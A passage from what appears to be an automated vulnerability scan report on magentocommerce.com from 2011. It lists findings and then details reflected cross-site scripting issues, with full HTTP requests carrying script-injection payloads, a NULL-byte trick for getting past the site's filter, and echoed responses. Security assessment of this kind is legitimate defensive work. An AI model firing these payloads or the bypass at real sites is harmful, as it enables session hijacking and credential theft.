4.144. http://www.magentocommerce.com/services/training

4.145. http://www.magentocommerce.com/showcase

4.146. http://www.magentocommerce.com/sitemap/

4.147. http://www.magentocommerce.com/support/magento-user-guide-book

4.148. http://www.magentocommerce.com/support/magento_core_api

4.149. http://www.magentocommerce.com/support/overview

4.150. http://www.magentocommerce.com/svn

4.151. http://www.magentocommerce.com/system-requirements

4.152. http://www.magentocommerce.com/trackback/2509/

4.153. http://www.magentocommerce.com/trackback/2555/

4.154. http://www.magentocommerce.com/trackback/2556/

4.155. http://www.magentocommerce.com/trackback/2557/

4.156. http://www.magentocommerce.com/trackback/2571/

4.157. http://www.magentocommerce.com/trackback/323/

4.158. http://www.magentocommerce.com/trackback/383/

4.159. http://www.magentocommerce.com/trackback/446/

4.160. http://www.magentocommerce.com/trackback/561/

4.161. http://www.magentocommerce.com/trackback/625/

4.162. http://www.magentocommerce.com/trackback/713/

4.163. http://www.magentocommerce.com/trackback/892/

4.164. http://www.magentocommerce.com/translations

4.165. http://www.magentocommerce.com/ua

4.166. http://www.magentocommerce.com/vi

4.167. http://www.magentocommerce.com/virtual/download-magento/

4.168. http://www.magentocommerce.com/virtual/enterprise-register/

4.169. http://www.magentocommerce.com/whitepaper/

4.170. http://www.magentocommerce.com/wiki

5. Password field with autocomplete enabled

5.1. http://www.magentocommerce.com/

5.2. http://www.magentocommerce.com/!!!--

5.3. http://www.magentocommerce.com/answers/

5.4. http://www.magentocommerce.com/blog

5.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

5.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

5.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

5.8. http://www.magentocommerce.com/boards/

5.9. http://www.magentocommerce.com/boards/viewforum/10252/

5.10. http://www.magentocommerce.com/boards/viewthread/1647/

5.11. http://www.magentocommerce.com/bug-tracking

5.12. http://www.magentocommerce.com/casestudies

5.13. http://www.magentocommerce.com/company/

5.14. http://www.magentocommerce.com/company/careers

5.15. http://www.magentocommerce.com/company/contact-us

5.16. http://www.magentocommerce.com/company/contact-us/

5.17. http://www.magentocommerce.com/company/contact-us/thank_you

5.18. http://www.magentocommerce.com/company/events

5.19. http://www.magentocommerce.com/company/events/

5.20. http://www.magentocommerce.com/company/inthepress

5.21. http://www.magentocommerce.com/company/inthepress/

5.22. http://www.magentocommerce.com/company/jobs/

5.23. http://www.magentocommerce.com/company/leadership

5.24. http://www.magentocommerce.com/company/leadership/

5.25. http://www.magentocommerce.com/company/media

5.26. http://www.magentocommerce.com/company/media/

5.27. http://www.magentocommerce.com/company/pci-compliance

5.28. http://www.magentocommerce.com/company/press-releases

5.29. http://www.magentocommerce.com/company/press-releases/

5.30. http://www.magentocommerce.com/company/privacy

5.31. http://www.magentocommerce.com/company/terms

5.32. http://www.magentocommerce.com/de

5.33. http://www.magentocommerce.com/demo

5.34. http://www.magentocommerce.com/design_guide

5.35. http://www.magentocommerce.com/dk

5.36. http://www.magentocommerce.com/download

5.37. http://www.magentocommerce.com/download/diff

5.38. http://www.magentocommerce.com/download/login_form

5.39. http://www.magentocommerce.com/download/release_notes

5.40. http://www.magentocommerce.com/es

5.41. http://www.magentocommerce.com/fr

5.42. http://www.magentocommerce.com/he

5.43. http://www.magentocommerce.com/hu

5.44. http://www.magentocommerce.com/imagine

5.45. http://www.magentocommerce.com/it

5.46. http://www.magentocommerce.com/jobs

5.47. http://www.magentocommerce.com/jobs/

5.48. http://www.magentocommerce.com/jobs/p/2/

5.49. http://www.magentocommerce.com/knowledge-base

5.50. http://www.magentocommerce.com/license/

5.51. http://www.magentocommerce.com/license/enterprise-edition

5.52. http://www.magentocommerce.com/lodger-footwear/

5.53. http://www.magentocommerce.com/lt

5.54. http://www.magentocommerce.com/magento-connect

5.55. http://www.magentocommerce.com/maps/online

5.56. http://www.magentocommerce.com/media/interviews

5.57. http://www.magentocommerce.com/media/interviews/alpedia/view

5.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view

5.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

5.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

5.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

5.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

5.63. http://www.magentocommerce.com/media/interviews/man-junk/view

5.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

5.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

5.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

5.67. http://www.magentocommerce.com/media/interviews/shoebacca/view

5.68. http://www.magentocommerce.com/media/interviews/signing-time/view

5.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

5.70. http://www.magentocommerce.com/media/interviews/timeout-online/view

5.71. http://www.magentocommerce.com/media/interviews/tvonics/view

5.72. http://www.magentocommerce.com/media/interviews/wander/view

5.73. http://www.magentocommerce.com/media/interviews/wearport/view

5.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view

5.75. http://www.magentocommerce.com/media/screencasts

5.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

5.77. http://www.magentocommerce.com/media/screencasts/community-groups/view

5.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view

5.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

5.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

5.81. http://www.magentocommerce.com/media/screencasts/currency/view

5.82. http://www.magentocommerce.com/media/screencasts/data-exporting/view

5.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

5.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

5.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view

5.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

5.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view

5.88. http://www.magentocommerce.com/media/screencasts/permissions/view

5.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

5.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view

5.91. http://www.magentocommerce.com/media/screencasts/search/view

5.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

5.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view

5.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view

5.95. http://www.magentocommerce.com/media/screencasts/upsells/view

5.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

5.97. http://www.magentocommerce.com/media/screenshots

5.98. http://www.magentocommerce.com/media/videos

5.99. http://www.magentocommerce.com/media/videos/

5.100. http://www.magentocommerce.com/media/webinars

5.101. http://www.magentocommerce.com/media/webinars/

5.102. http://www.magentocommerce.com/partners/

5.103. http://www.magentocommerce.com/partners/find/bronze-solution/

5.104. http://www.magentocommerce.com/partners/find/hosting-partners/

5.105. http://www.magentocommerce.com/partners/find/industry-partners/

5.106. http://www.magentocommerce.com/partners/find/solution-partners/

5.107. http://www.magentocommerce.com/partners/hosting-partners

5.108. http://www.magentocommerce.com/partners/industry-partners

5.109. http://www.magentocommerce.com/partners/solution-partners

5.110. http://www.magentocommerce.com/partners/view/117/gorilla

5.111. http://www.magentocommerce.com/pl

5.112. http://www.magentocommerce.com/product/community-edition

5.113. http://www.magentocommerce.com/product/compare

5.114. http://www.magentocommerce.com/product/deployed-solutions

5.115. http://www.magentocommerce.com/product/emerging-business

5.116. http://www.magentocommerce.com/product/enterprise-community-faqs

5.117. http://www.magentocommerce.com/product/enterprise-edition

5.118. http://www.magentocommerce.com/product/enterprise-level

5.119. http://www.magentocommerce.com/product/faq

5.120. http://www.magentocommerce.com/product/features

5.121. http://www.magentocommerce.com/product/hosted-solutions

5.122. http://www.magentocommerce.com/product/magento-go

5.123. http://www.magentocommerce.com/product/magento-zend

5.124. http://www.magentocommerce.com/product/mobile

5.125. http://www.magentocommerce.com/product/professional-edition

5.126. http://www.magentocommerce.com/products/checkout/cart/

5.127. http://www.magentocommerce.com/products/job-post.html

5.128. http://www.magentocommerce.com/pt_BR

5.129. http://www.magentocommerce.com/roadmap/issue-roadmap

5.130. http://www.magentocommerce.com/ru

5.131. http://www.magentocommerce.com/services

5.132. http://www.magentocommerce.com/services/

5.133. http://www.magentocommerce.com/services/course-pricing

5.134. http://www.magentocommerce.com/services/course-schedule

5.135. http://www.magentocommerce.com/services/descriptions

5.136. http://www.magentocommerce.com/services/professional-services

5.137. http://www.magentocommerce.com/services/register-for-training

5.138. http://www.magentocommerce.com/services/testimonials

5.139. http://www.magentocommerce.com/services/training

5.140. http://www.magentocommerce.com/showcase

5.141. http://www.magentocommerce.com/sitemap/

5.142. http://www.magentocommerce.com/support/magento-user-guide-book

5.143. http://www.magentocommerce.com/support/magento_core_api

5.144. http://www.magentocommerce.com/support/overview

5.145. http://www.magentocommerce.com/svn

5.146. http://www.magentocommerce.com/system-requirements

5.147. http://www.magentocommerce.com/translations

5.148. http://www.magentocommerce.com/ua

5.149. http://www.magentocommerce.com/vi

5.150. http://www.magentocommerce.com/virtual/download-magento/

5.151. http://www.magentocommerce.com/virtual/enterprise-register/

5.152. http://www.magentocommerce.com/whitepaper/

6. Cross-domain POST

6.1. http://www.magentocommerce.com/

6.2. http://www.magentocommerce.com/!!!--

6.3. http://www.magentocommerce.com/answers/

6.4. http://www.magentocommerce.com/blog

6.5. http://www.magentocommerce.com/blog

6.6. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

6.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

6.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

6.9. http://www.magentocommerce.com/boards/

6.10. http://www.magentocommerce.com/boards/viewforum/10252/

6.11. http://www.magentocommerce.com/boards/viewthread/1647/

6.12. http://www.magentocommerce.com/bug-tracking

6.13. http://www.magentocommerce.com/company/

6.14. http://www.magentocommerce.com/company/careers

6.15. http://www.magentocommerce.com/company/contact-us

6.16. http://www.magentocommerce.com/company/contact-us

6.17. http://www.magentocommerce.com/company/contact-us/

6.18. http://www.magentocommerce.com/company/contact-us/

6.19. http://www.magentocommerce.com/company/contact-us/thank_you

6.20. http://www.magentocommerce.com/company/events

6.21. http://www.magentocommerce.com/company/events/

6.22. http://www.magentocommerce.com/company/inthepress

6.23. http://www.magentocommerce.com/company/inthepress/

6.24. http://www.magentocommerce.com/company/jobs/

6.25. http://www.magentocommerce.com/company/leadership

6.26. http://www.magentocommerce.com/company/leadership/

6.27. http://www.magentocommerce.com/company/media

6.28. http://www.magentocommerce.com/company/media/

6.29. http://www.magentocommerce.com/company/pci-compliance

6.30. http://www.magentocommerce.com/company/press-releases

6.31. http://www.magentocommerce.com/company/press-releases/

6.32. http://www.magentocommerce.com/company/privacy

6.33. http://www.magentocommerce.com/company/terms

6.34. http://www.magentocommerce.com/de

6.35. http://www.magentocommerce.com/demo

6.36. http://www.magentocommerce.com/design_guide

6.37. http://www.magentocommerce.com/dk

6.38. http://www.magentocommerce.com/download

6.39. http://www.magentocommerce.com/download/diff

6.40. http://www.magentocommerce.com/download/release_notes

6.41. http://www.magentocommerce.com/es

6.42. http://www.magentocommerce.com/fr

6.43. http://www.magentocommerce.com/he

6.44. http://www.magentocommerce.com/hu

6.45. http://www.magentocommerce.com/imagine

6.46. http://www.magentocommerce.com/it

6.47. http://www.magentocommerce.com/jobs

6.48. http://www.magentocommerce.com/jobs/

6.49. http://www.magentocommerce.com/jobs/p/2/

6.50. http://www.magentocommerce.com/knowledge-base

6.51. http://www.magentocommerce.com/license/

6.52. http://www.magentocommerce.com/license/enterprise-edition

6.53. http://www.magentocommerce.com/lodger-footwear/

6.54. http://www.magentocommerce.com/lt

6.55. http://www.magentocommerce.com/magento-connect

6.56. http://www.magentocommerce.com/magento-connect

6.57. http://www.magentocommerce.com/maps/online

6.58. http://www.magentocommerce.com/media/interviews

6.59. http://www.magentocommerce.com/media/interviews/alpedia/view

6.60. http://www.magentocommerce.com/media/interviews/bright-light-media/view

6.61. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

6.62. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

6.63. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

6.64. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

6.65. http://www.magentocommerce.com/media/interviews/man-junk/view

6.66. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

6.67. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

6.68. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

6.69. http://www.magentocommerce.com/media/interviews/shoebacca/view

6.70. http://www.magentocommerce.com/media/interviews/signing-time/view

6.71. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

6.72. http://www.magentocommerce.com/media/interviews/timeout-online/view

6.73. http://www.magentocommerce.com/media/interviews/tvonics/view

6.74. http://www.magentocommerce.com/media/interviews/wander/view

6.75. http://www.magentocommerce.com/media/interviews/wearport/view

6.76. http://www.magentocommerce.com/media/interviews/wkf-communications/view

6.77. http://www.magentocommerce.com/media/screencasts

6.78. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

6.79. http://www.magentocommerce.com/media/screencasts/community-groups/view

6.80. http://www.magentocommerce.com/media/screencasts/configurable-products/view

6.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

6.82. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

6.83. http://www.magentocommerce.com/media/screencasts/currency/view

6.84. http://www.magentocommerce.com/media/screencasts/data-exporting/view

6.85. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view

6.86. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view

6.87. http://www.magentocommerce.com/media/screencasts/grouped-products/view

6.88. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view

6.89. http://www.magentocommerce.com/media/screencasts/landing-pages/view

6.90. http://www.magentocommerce.com/media/screencasts/permissions/view

6.91. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

6.92. http://www.magentocommerce.com/media/screencasts/product-comparison/view

6.93. http://www.magentocommerce.com/media/screencasts/search/view

6.94. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view

6.95. http://www.magentocommerce.com/media/screencasts/static-blocks/view

6.96. http://www.magentocommerce.com/media/screencasts/transactional-email/view

6.97. http://www.magentocommerce.com/media/screencasts/upsells/view

6.98. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view

6.99. http://www.magentocommerce.com/media/screenshots

6.100. http://www.magentocommerce.com/media/videos

6.101. http://www.magentocommerce.com/media/videos/

6.102. http://www.magentocommerce.com/media/webinars

6.103. http://www.magentocommerce.com/media/webinars/

6.104. http://www.magentocommerce.com/partners/

6.105. http://www.magentocommerce.com/partners/find/bronze-solution/

6.106. http://www.magentocommerce.com/partners/find/hosting-partners/

6.107. http://www.magentocommerce.com/partners/find/industry-partners/

6.108. http://www.magentocommerce.com/partners/find/solution-partners/

6.109. http://www.magentocommerce.com/partners/hosting-partners

6.110. http://www.magentocommerce.com/partners/industry-partners

6.111. http://www.magentocommerce.com/partners/solution-partners

6.112. http://www.magentocommerce.com/partners/view/117/gorilla

6.113. http://www.magentocommerce.com/pl

6.114. http://www.magentocommerce.com/product/community-edition

6.115. http://www.magentocommerce.com/product/compare

6.116. http://www.magentocommerce.com/product/deployed-solutions

6.117. http://www.magentocommerce.com/product/emerging-business

6.118. http://www.magentocommerce.com/product/enterprise-community-faqs

6.119. http://www.magentocommerce.com/product/enterprise-edition

6.120. http://www.magentocommerce.com/product/enterprise-level

6.121. http://www.magentocommerce.com/product/faq

6.122. http://www.magentocommerce.com/product/features

6.123. http://www.magentocommerce.com/product/hosted-solutions

6.124. http://www.magentocommerce.com/product/magento-go

6.125. http://www.magentocommerce.com/product/magento-zend

6.126. http://www.magentocommerce.com/product/mobile

6.127. http://www.magentocommerce.com/product/professional-edition

6.128. http://www.magentocommerce.com/products/checkout/cart/

6.129. http://www.magentocommerce.com/products/job-post.html

6.130. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js

6.131. http://www.magentocommerce.com/pt_BR

6.132. http://www.magentocommerce.com/roadmap/issue-roadmap

6.133. http://www.magentocommerce.com/ru

6.134. http://www.magentocommerce.com/services

6.135. http://www.magentocommerce.com/services/

6.136. http://www.magentocommerce.com/services/contact-us-popup

6.137. http://www.magentocommerce.com/services/course-pricing

6.138. http://www.magentocommerce.com/services/course-schedule

6.139. http://www.magentocommerce.com/services/descriptions

6.140. http://www.magentocommerce.com/services/professional-services

6.141. http://www.magentocommerce.com/services/register-for-training

6.142. http://www.magentocommerce.com/services/testimonials

6.143. http://www.magentocommerce.com/services/training

6.144. http://www.magentocommerce.com/showcase

6.145. http://www.magentocommerce.com/sitemap/

6.146. http://www.magentocommerce.com/support/magento-user-guide-book

6.147. http://www.magentocommerce.com/support/magento_core_api

6.148. http://www.magentocommerce.com/support/overview

6.149. http://www.magentocommerce.com/svn

6.150. http://www.magentocommerce.com/system-requirements

6.151. http://www.magentocommerce.com/translations

6.152. http://www.magentocommerce.com/ua

6.153. http://www.magentocommerce.com/vi

6.154. http://www.magentocommerce.com/virtual/download-magento/

6.155. http://www.magentocommerce.com/virtual/enterprise-register/

6.156. http://www.magentocommerce.com/whitepaper/

7. Cross-domain script include

7.1. http://www.magentocommerce.com/blog

7.2. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

7.3. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

7.4. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

7.5. http://www.magentocommerce.com/download

7.6. http://www.magentocommerce.com/magento-connect

7.7. http://www.magentocommerce.com/maps/online

7.8. http://www.magentocommerce.com/services/contact-us-popup

8. Email addresses disclosed

8.1. http://www.magentocommerce.com/boards/

8.2. http://www.magentocommerce.com/company/careers

8.3. http://www.magentocommerce.com/company/jobs/

8.4. http://www.magentocommerce.com/company/media

8.5. http://www.magentocommerce.com/company/media/

8.6. http://www.magentocommerce.com/company/privacy

8.7. http://www.magentocommerce.com/de

8.8. http://www.magentocommerce.com/es

8.9. http://www.magentocommerce.com/fr

8.10. http://www.magentocommerce.com/it

8.11. http://www.magentocommerce.com/js/rating.js

8.12. http://www.magentocommerce.com/js/tracklinks.js

8.13. http://www.magentocommerce.com/pl

8.14. http://www.magentocommerce.com/products/js/mage/cookies.js

8.15. http://www.magentocommerce.com/products/js/mage/translate.js

8.16. http://www.magentocommerce.com/products/js/scriptaculous/controls.js

8.17. http://www.magentocommerce.com/products/js/scriptaculous/dragdrop.js

8.18. http://www.magentocommerce.com/products/js/varien/form.js

8.19. http://www.magentocommerce.com/products/js/varien/js.js

8.20. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/print.css

8.21. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/styles.css

8.22. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/css/widgets.css

8.23. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/enterprise/catalogevent.js

8.24. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js

8.25. http://www.magentocommerce.com/ru

8.26. http://www.magentocommerce.com/ua

9. Social security numbers disclosed

10. Credit card numbers disclosed

11. Robots.txt file

12. HTML does not specify charset

12.1. http://www.magentocommerce.com/images/avatars/uploads/avatar_19608.png

12.2. http://www.magentocommerce.com/img/btn_submit.gif

12.3. http://www.magentocommerce.com/img/icon_post_comment.gif

12.4. http://www.magentocommerce.com/img/magento_dnld_rr.gif

13. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 54 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.magentocommerce.com/answers/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005e56c"><script>alert(1)</script>abbcd2c92b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e56c"><script>alert(1)</script>abbcd2c92b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /answers/?%005e56c"><script>alert(1)</script>abbcd2c92b6=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176414; expires=Sat, 11-Aug-2012 15:13:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:13:34 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:13:34 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334815%7C311b13ed5fdebae6aafa387d0b84b492%7C1313162015%7C-1%7C1313334815; expires=Fri, 12-Aug-2011 19:13:35 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:13:35 GMT
Content-Length: 54295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<input type="hidden" name="login[back_url]" value="/answers/?%005e56c"><script>alert(1)</script>abbcd2c92b6=1">
...[SNIP]...

1.2. http://www.magentocommerce.com/boards/viewforum/10252/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f656"><script>alert(1)</script>687b2c4ddbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boards/viewforum/102523f656"><script>alert(1)</script>687b2c4ddbf/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176573; expires=Sat, 11-Aug-2012 15:16:13 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:13 GMT
Content-Length: 34546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/boards/viewforum/102523f656"><script>alert(1)</script>687b2c4ddbf" />
...[SNIP]...

1.3. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a42"><script>alert(1)</script>cfcde977640 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/adding-related-productsc1a42"><script>alert(1)</script>cfcde977640/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176237; expires=Sat, 11-Aug-2012 15:10:37 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:37 GMT
Content-Length: 33506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/adding-related-productsc1a42"><script>alert(1)</script>cfcde977640/view">
...[SNIP]...

1.4. http://www.magentocommerce.com/media/screencasts/adding-related-products/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f335"><script>alert(1)</script>878d14e3ada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f335"><script>alert(1)</script>878d14e3ada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/adding-related-products/view?%002f335"><script>alert(1)</script>878d14e3ada=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
